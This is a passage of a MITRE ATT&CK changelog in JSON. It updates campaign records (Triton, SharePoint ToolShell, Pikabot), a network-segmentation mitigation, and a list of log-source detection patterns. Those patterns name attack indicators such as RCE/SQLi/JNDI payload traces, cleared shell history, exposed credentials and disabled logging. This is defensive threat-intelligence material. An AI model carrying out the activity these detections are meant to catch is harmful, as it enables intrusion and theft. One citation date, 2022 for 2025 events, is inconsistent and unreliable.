class=\"diff_add\">&nbsp;who&nbsp;probed&nbsp;victim&nbsp;infrastructure.(Citation:&nbsp;Mandiant&nbsp;ROADSW</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">September&nbsp;2022)&nbsp;A&nbsp;second&nbsp;wave&nbsp;of&nbsp;attacks&nbsp;was&nbsp;launched&nbsp;in&nbsp;Sep</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">EEP&nbsp;August&nbsp;2022)(Citation:&nbsp;Microsoft&nbsp;Albanian&nbsp;Government&nbsp;Att</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tember&nbsp;2022&nbsp;using&nbsp;similar&nbsp;tactics&nbsp;after&nbsp;public&nbsp;attribution&nbsp;o</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">acks&nbsp;September&nbsp;2022)(Citation:&nbsp;CISA&nbsp;Iran&nbsp;Albanian&nbsp;Attacks&nbsp;Se</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">f&nbsp;the&nbsp;previous&nbsp;activity&nbsp;to&nbsp;Iran&nbsp;and&nbsp;the&nbsp;severing&nbsp;of&nbsp;diplomat</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ptember&nbsp;2022)&nbsp;A&nbsp;second&nbsp;wave&nbsp;of&nbsp;attacks&nbsp;was&nbsp;launched&nbsp;in&nbsp;Septe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ic&nbsp;ties&nbsp;between&nbsp;Iran&nbsp;and&nbsp;Albania.(Citation:&nbsp;CISA&nbsp;Iran&nbsp;Albani</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">mber&nbsp;2022&nbsp;using&nbsp;similar&nbsp;tactics&nbsp;following&nbsp;public&nbsp;attribution</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">an&nbsp;Attacks&nbsp;September&nbsp;2022)&nbsp;&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;of&nbsp;the&nbsp;previous&nbsp;activity&nbsp;to&nbsp;Iran&nbsp;and&nbsp;the&nbsp;severing&nbsp;of&nbsp;diplom</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">atic&nbsp;ties&nbsp;between&nbsp;Iran&nbsp;and&nbsp;Albania.(Citation:&nbsp;CISA&nbsp;Iran&nbsp;Alba</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nian&nbsp;Attacks&nbsp;September&nbsp;2022)&nbsp;&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "campaign",
                    "spec_version": "2.1",
                    "id": "campaign--45a98f02-852f-49b2-94c0-c63207bebbbf",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-03-25 17:47:37.619000+00:00",
                    "modified": "2026-04-23 00:24:57.457000+00:00",
                    "name": "Triton Safety Instrumented System Attack",
                    "description": "[Triton Safety Instrumented System Attack](https://attack.mitre.org/campaigns/C0030) was a campaign employed by [TEMP.Veles](https://attack.mitre.org/groups/G0088) which leveraged the [Triton](https://attack.mitre.org/software/S1009) malware framework against a petrochemical organization.(Citation: Triton-EENews-2017) The malware and techniques used within this campaign targeted specific Triconex [Safety Controller](https://attack.mitre.org/assets/A0010)s within the environment.(Citation: FireEye TRITON 2018) The incident was eventually discovered due to a safety trip that occurred as a result of an issue in the malware.(Citation: FireEye TRITON 2017)\n",
                    "aliases": [
                        "Triton Safety Instrumented System Attack"
                    ],
                    "first_seen": "2017-06-01 04:00:00+00:00",
                    "last_seen": "2017-08-01 04:00:00+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/campaigns/C0030",
                            "external_id": "C0030"
                        },
                        {
                            "source_name": "Triton-EENews-2017",
                            "description": "Blake Sobczak. (2019, March 7). The inside story of the world\u2019s most dangerous malware. Retrieved March 25, 2024.",
                            "url": "https://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/"
                        },
                        {
                            "source_name": "FireEye TRITON 2017",
                            "description": "Johnson, B, et. al. (2017, December 14). Attackers Deploy New ICS Attack Framework \"TRITON\" and Cause Operational Disruption to Critical Infrastructure. Retrieved January 6, 2021.",
                            "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html"
                        },
                        {
                            "source_name": "FireEye TRITON 2018",
                            "description": "Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20200618231942/https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_first_seen_citation": "(Citation: Triton-EENews-2017)",
                    "x_mitre_last_seen_citation": "(Citation: Triton-EENews-2017)",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"dictionary_item_removed\": {\"root['x_mitre_domains']\": [\"ics-attack\", \"enterprise-attack\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:24:57.457000+00:00\", \"old_value\": \"2024-11-17 16:15:02.223000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                }
            ],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "campaign",
                    "spec_version": "2.1",
                    "id": "campaign--1a0576df-df21-4775-843e-844d8a58a94b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-15 19:31:55.608000+00:00",
                    "modified": "2026-04-23 18:46:50.936000+00:00",
                    "name": "SharePoint ToolShell Exploitation",
                    "description": "The [SharePoint ToolShell Exploitation](https://attack.mitre.org/campaigns/C0058) campaign was conducted in July 2025 and encompassed the first waves of exploitation against incompletely patched spoofing (CVE-2025-49706) and remote code execution (CVE-2025-49704) vulnerabilities affecting on-premises Microsoft SharePoint servers. Later patched and updated as CVE-2025-53770 and CVE-2025-53771, the ToolShell vulnerabilities were widely exploited including by China-based ransomware actor Storm-2603 and espionage actors [Threat Group-3390](https://attack.mitre.org/groups/G0027) and [ZIRCONIUM](https://attack.mitre.org/groups/G0128). [SharePoint ToolShell Exploitation](https://attack.mitre.org/campaigns/C0058) targeted multiple regions and industries including finance, education, energy, and healthcare across Asia, Europe, and the United States.(Citation: Microsoft SharePoint Exploit JUL 2025)(Citation: Palo Alto SharePoint Vulnerabilities JUL 2025)(Citation: Eye Research ToolShell JUL 2025)(Citation: ESET ToolShell JUL 2025)(Citation: Trend Micro SharePoint Attacks JUL 2025)\n",
                    "aliases": [
                        "SharePoint ToolShell Exploitation"
                    ],
                    "first_seen": "2025-07-01 04:00:00+00:00",
                    "last_seen": "2025-07-01 04:00:00+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/campaigns/C0058",
                            "external_id": "C0058"
                        },
                        {
                            "source_name": "Trend Micro SharePoint Attacks JUL 2025",
                            "description": " Trend Micro Research. (2022, July 22). Proactive Security Insights for SharePoint Attacks (CVE-2025-53770 and CVE-2025-53771). Retrieved October 15, 2025.",
                            "url": "https://www.trendmicro.com/en_us/research/25/g/cve-2025-53770-and-cve-2025-53771-sharepoint-attacks.html"
                        },
                        {
                            "source_name": "ESET ToolShell JUL 2025",
                            "description": "ESET Research. (2025, July 24). ToolShell: An all-you-can-eat buffet for threat actors. Retrieved October 15, 2025.",
                            "url": "https://www.welivesecurity.com/en/eset-research/toolshell-an-all-you-can-eat-buffet-for-threat-actors/"
                        },
                        {
                            "source_name": "Eye Research ToolShell JUL 2025",
                            "description": "Eye Security. (2025, July 19). SharePoint Under Siege: ToolShell Exploit (CVE-2025-49706 & CVE-2025-49704). Retrieved October 15, 2025.",
                            "url": "https://research.eye.security/sharepoint-under-siege/"
                        },
                        {
                            "source_name": "Microsoft SharePoint Exploit JUL 2025",
                            "description": "Microsoft Threat Intelligence. (2025, July 22). Disrupting active exploitation of on-premises SharePoint vulnerabilities. Retrieved October 15, 2025.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/#storm-2603"
                        },
                        {
                            "source_name": "Palo Alto SharePoint Vulnerabilities JUL 2025",
                            "description": "Unit 42. (2025, July 31). Active Exploitation of Microsoft SharePoint Vulnerabilities: Threat Brief (Updated). Retrieved October 15, 2025.",
                            "url": "https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Wai Linn Oo, Kernellix Co.,Ltd."
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_first_seen_citation": "(Citation: Microsoft SharePoint Exploit JUL 2025)",
                    "x_mitre_last_seen_citation": "(Citation: Palo Alto SharePoint Vulnerabilities JUL 2025)",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"dictionary_item_removed\": {\"root['x_mitre_domains']\": [\"enterprise-attack\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:46:50.936000+00:00\", \"old_value\": \"2025-11-12 15:13:10.723000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Wai Linn Oo, Kernellix Co.,Ltd.\", \"old_value\": \"Wai Linn Oo @ Kernellix\"}}}",
                    "previous_version": "1.0"
                },
                {
                    "type": "campaign",
                    "spec_version": "2.1",
                    "id": "campaign--57541e3b-657e-463a-a4ab-ca08d7ea9965",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-07-17 20:23:22.945000+00:00",
                    "modified": "2026-04-22 18:11:30.378000+00:00",
                    "name": "Water Curupira Pikabot Distribution",
                    "description": "[Pikabot](https://attack.mitre.org/software/S1145) was distributed in [Water Curupira Pikabot Distribution](https://attack.mitre.org/campaigns/C0037) throughout 2023 by an entity linked to BlackBasta ransomware deployment via email attachments. This activity followed the take-down of [QakBot](https://attack.mitre.org/software/S0650), with several technical overlaps and similarities with [QakBot](https://attack.mitre.org/software/S0650), indicating a possible connection. The identified activity led to the deployment of tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154), while coinciding with campaigns delivering [DarkGate](https://attack.mitre.org/software/S1111) and [IcedID](https://attack.mitre.org/software/S0483) en route to ransomware deployment.(Citation: TrendMicro Pikabot 2024)",
                    "aliases": [
                        "Water Curupira Pikabot Distribution"
                    ],
                    "first_seen": "2023-01-01 05:00:00+00:00",
                    "last_seen": "2023-12-01 05:00:00+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/campaigns/C0037",
                            "external_id": "C0037"
                        },
                        {
                            "source_name": "TrendMicro Pikabot 2024",
                            "description": "Shinji Robert Arasawa, Joshua Aquino, Charles Steven Derion, Juhn Emmanuel Atanque, Francisrey Joshua Castillo, John Carlo Marquez, Henry Salcedo, John Rainier Navato, Arianne Dela Cruz, Raymart Yambot & Ian Kenefick. (2024, January 9). Black Basta-Affiliated Water Curupira\u2019s Pikabot Spam Campaign. Retrieved July 17, 2024.",
                            "url": "https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Inna Danilevich, U.S. Bank"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_first_seen_citation": "(Citation: TrendMicro Pikabot 2024)",
                    "x_mitre_last_seen_citation": "(Citation: TrendMicro Pikabot 2024)",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"dictionary_item_removed\": {\"root['x_mitre_domains']\": [\"enterprise-attack\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 18:11:30.378000+00:00\", \"old_value\": \"2024-10-28 19:02:30.340000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.0"
                }
            ],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "assets": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "mitigations": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "course-of-action",
                    "id": "course-of-action--86598de0-b347-4928-9eb0-0acbfc21908c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-10 20:41:03.271000+00:00",
                    "modified": "2026-04-24 19:41:50.467000+00:00",
                    "name": "Network Segmentation",
                    "description": "Network segmentation involves dividing a network into smaller, isolated segments to control and limit the flow of traffic between devices, systems, and applications. By segmenting networks, organizations can reduce the attack surface, restrict lateral movement by adversaries, and protect critical assets from compromise.\n\nEffective network segmentation leverages a combination of physical boundaries, logical separation through VLANs, and access control policies enforced by network appliances like firewalls, routers, and cloud-based configurations. This mitigation can be implemented through the following measures:\n\nSegment Critical Systems:\n\n- Identify and group systems based on their function, sensitivity, and risk. Examples include payment systems, HR databases, production systems, and internet-facing servers.\n- Use VLANs, firewalls, or routers to enforce logical separation.\n\nImplement DMZ for Public-Facing Services:\n\n- Host web servers, DNS servers, and email servers in a DMZ to limit their access to internal systems.\n- Apply strict firewall rules to filter traffic between the DMZ and internal networks.\n\nUse Cloud-Based Segmentation:\n\n- In cloud environments, use VPCs, subnets, and security groups to isolate applications and enforce traffic rules.\n- Apply AWS Transit Gateway or Azure VNet peering for controlled connectivity between cloud segments.\n\nApply Microsegmentation for Workloads:\n\n- Use software-defined networking (SDN) tools to implement workload-level segmentation and prevent lateral movement.\n\nRestrict Traffic with ACLs and Firewalls:\n\n- Apply Access Control Lists (ACLs) to network devices to enforce \"deny by default\" policies.\n- Use firewalls to restrict both north-south (external-internal) and east-west (internal-internal) traffic.\n\nMonitor and Audit Segmented Networks:\n\n- Regularly review firewall rules, ACLs, and segmentation policies.\n- Monitor network flows for anomalies to ensure segmentation is effective.\n\nTest Segmentation Effectiveness:\n\n- Perform periodic penetration tests to verify that unauthorized access is blocked between network segments.",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M1030",
                            "external_id": "M1030"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 19:41:50.467000+00:00\", \"old_value\": \"2025-04-02 17:29:32.003000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.2"
                }
            ],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "datasources": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "datacomponents": {
            "additions": [],
            "major_version_changes": [
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-24 19:46:47.171000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0038",
                            "external_id": "DC0038"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Application Log Content",
                    "description": "Application Log Content refers to logs generated by applications or services, providing a record of their activity. These logs may include metrics, errors, performance data, and operational alerts from web, mail, or other applications. These logs are vital for monitoring application behavior and detecting malicious activities or anomalies. Examples: \n\n- Web Application Logs: These logs include information about requests, responses, errors, and security events (e.g., unauthorized access attempts).\n- Email Application Logs: Logs contain metadata about emails sent, received, or blocked (e.g., sender/receiver addresses, message IDs).\n- SaaS Application Logs: Activity logs include user logins, configuration changes, and access to sensitive resources.\n- Cloud Application Logs: Logs detail control plane activities, including API calls, instance modifications, and network changes.\n- System/Application Monitoring Logs: Logs provide insights into application performance, errors, and anomalies.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "android:logcat",
                            "channel": "Default IME active or bound to <pkg> (InputMethodManager reports imeId=<pkg>)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Default IME changed/active: imeId=<pkg>, onStartInput/onFinishInput high frequency. TYPE_APPLICATION_OVERLAY|addView .* showing on top of package <otherPkg>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Default IME active imeId=<pkg>; frequent onStartInput/commitText calls"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "addView TYPE_APPLICATION_OVERLAY|TYPE_APPLICATION_ATTACHED_DIALOG shown over <target_pkg>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Secure/Global reads of device_policy_manager, accessibility_enabled, default_vpn, always_on_vpn"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Task switch from browser/custom tab to handler immediately after OAuth return"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "ACTION_OPEN_DOCUMENT_TREE / ACTION_OPEN_DOCUMENT invoked without user gesture or repeatedly in background"
                        },
                        {
                            "name": "Application Log",
                            "channel": "None"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "smtpd$.*$: .*from=[.*@internaldomain.com](mailto:.*@internaldomain.com) to=[.*@internaldomain.com](mailto:.*@internaldomain.com)"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Inbound messages with anomalous headers, spoofed SPF/DKIM failures"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Inbound emails containing hyperlinks from suspicious sources"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Inbound email attachments logged from MTAs with suspicious metadata"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Mismatch between authenticated username and From header in email"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "High-frequency inbound mail activity to a specific recipient address"
                        },
                        {
                            "name": "ApplicationLog:API",
                            "channel": "Docker/Kubernetes API access from external sources"
                        },
                        {
                            "name": "ApplicationLog:CallRecords",
                            "channel": "Outbound or inbound calls to high-risk or blocklisted numbers"
                        },
                        {
                            "name": "ApplicationLog:EntraIDPortal",
                            "channel": "DeviceRegistration events"
                        },
                        {
                            "name": "ApplicationLog:IIS",
                            "channel": "IIS W3C logs in C:\\inetpub\\logs\\LogFiles\\W3SVC* (spikes in 5xx, RCE/SQLi/path traversal/JNDI patterns)"
                        },
                        {
                            "name": "ApplicationLog:Ingress",
                            "channel": "Kubernetes NGINX/Envoy ingress controller logs with anomalous payloads and 5xx spikes"
                        },
                        {
                            "name": "ApplicationLog:Intune/MDM Logs",
                            "channel": "Enrollment events (e.g., MDMDeviceRegistration)"
                        },
                        {
                            "name": "ApplicationLog:MailServer",
                            "channel": "Unexpected additions of sieve rules or filtering directives"
                        },
                        {
                            "name": "ApplicationLog:Outlook",
                            "channel": "Outlook client-level rule creation actions not consistent with normal user activity"
                        },
                        {
                            "name": "ApplicationLog:WebServer",
                            "channel": "/var/log/httpd/access_log, /var/log/apache2/access.log, /var/log/nginx/access.log with exploit indicators and burst errors"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "SendEmail"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "InvokeModel"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "InvokeFunction: Unexpected or repeated invocation of functions not tied to known workflows"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "CreateUser|AttachRolePolicy|CreateAccessKey|UpdateAssumeRolePolicy|CreateLoginProfile"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "StopLogging, DeleteTrail, UpdateTrail: API calls that disable or modify logging services"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Repeated crash pattern within container or instance logs"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Elevated 5xx response rates in application logs or gateway layer"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "Add role assignment / ElevateAccess / Create service principal"
                        },
                        {
                            "name": "azure:audit",
                            "channel": "App registrations or consent grants by abnormal users or at unusual times"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "ConsentGrant: Suspicious consent grants to non-approved or unknown applications"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Modify Conditional Access Policy"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Register PTA Agent or Modify AD FS trust"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Resource access initiated using application credentials, not user accounts"
                        },
                        {
                            "name": "docker:daemon",
                            "channel": "container_create,container_start"
                        },
                        {
                            "name": "docker:events",
                            "channel": "Container exited with non-zero code repeatedly in short period"
                        },
                        {
                            "name": "docker:runtime",
                            "channel": "execution of cloud CLI tool (e.g., aws, az) inside container"
                        },
                        {
                            "name": "EDR:detection",
                            "channel": "ThreatDetected, QuarantineLog"
                        },
                        {
                            "name": "EDR:detection",
                            "channel": "ThreatLog"
                        },
                        {
                            "name": "esxi:esxupdate",
                            "channel": "/var/log/esxupdate.log contains VIB installed with `--force` or `--no-sig-check` and non-standard acceptance levels"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "/var/log/hostd.log anomalies (faults, crashes, restarts) around inbound connections"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Keywords: 'Backtrace','Signal 11','PANIC','hostd restarted','assert' or 'Service terminated unexpectedly' in /var/log/hostd.log, /var/log/vmkernel.log, /var/log/syslog.log."
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "unexpected script/command invocations via hostd"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Guest Operations API invocation: StartProgramInGuest, ListProcessesInGuest, ListFileInGuest, InitiateFileTransferFromGuest"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "unexpected script invocations producing long encoded strings"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Host daemon command log entries related to vib enumeration"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "New extension/module install with unknown vendor ID"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "vmkernel / OpenSLP logs for malformed requests"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "Symmetric crypto routines triggered for external session"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "ESXi process initiating asymmetric handshake with external host"
                        },
                        {
                            "name": "gcp:workspaceaudit",
                            "channel": "SendAs: Outbound messages with alias identities that differ from primary account"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Repeated or large UIPasteboard reads; background pasteboard access shortly before packaging"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "UIPasteboard read (general/string/data) by <bundle_id>; repeated reads or background access"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "UIWindow/UIView events indicating secure text entry focus, editingChanged bursts, unexpected firstResponder cycling"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Secure text entry focus and editingChanged bursts not typical for the app"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Presentation of credential-like view (UIAlertController with text fields / custom modal) not backed by system auth controller; frequent editingChanged in secureTextEntry fields"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Repeated canOpenURL checks across diverse schemes (\u2265N within short window)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "UIDocumentPickerViewController presented repeatedly without foreground interaction or with short dwell time"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "repeated sandbox denials related to restricted process/system interfaces consistent with process-table querying attempts"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "security-relevant kernel log messages indicating restricted system interface access attempts by app process (device-dependent visibility)"
                        },
                        {
                            "name": "journald:Application",
                            "channel": "Segfault or crash log entry associated with specific application binary"
                        },
                        {
                            "name": "journald:systemd",
                            "channel": "Repeated service restart attempts or unit failures"
                        },
                        {
                            "name": "kubernetes:orchestrator",
                            "channel": "Access to orchestrator logs containing credentials (Docker/Kubernetes logs)"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "cleared or truncated .bash_history"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "usb * new|thunderbolt|pci .* added|block.*: new .* device"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Inbound messages from webmail services containing attachments or URLs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kernel|systemd messages indicating 'segmentation fault'|'core dumped'|'service terminated unexpectedly' for sshd, smbd, vsftpd, mysqld, httpd, etc."
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "System daemons initiating encrypted sessions with unexpected destinations"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "milter configuration updated, transport rule initialized, unexpected script execution"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Repetitive HTTP 408, 500, or 503 errors logged within short timeframe"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Application or browser logs (webview errors, plugin enumerations) indicating suspicious script evaluation or plugin loads"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "processes binding to non-standard ports or sshd configured on unexpected port"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "system daemons initiating TLS sessions outside expected services"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "browser/office crash, segfault, abnormal termination"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Error/warning logs from services indicating load spike or worker exhaustion"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched from_domain vs return_path_domain"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "suspicious DHCP lease assignment with unexpected DNS or gateway"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "opened document|clicked link|segfault|abnormal termination|sandbox"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Authentication attempts into finance-related servers from unusual IPs or times"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sshd sessions with unusual port forwarding parameters"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Non-standard processes negotiating SSL/TLS key exchanges"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Module registration or stacktrace logs indicating segmentation faults or unknown module errors"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Segfaults, kernel oops, or crashes in security software processes"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Emails containing cleartext secrets (password=, api_key=, token=) shared across internal/external domains"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Transport Rule Modification"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Admin Audit Logs, Transport Rules"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "MailDelivery: High-frequency delivery of messages or attachments to a single recipient"
                        },
                        {
                            "name": "m365:exchange",
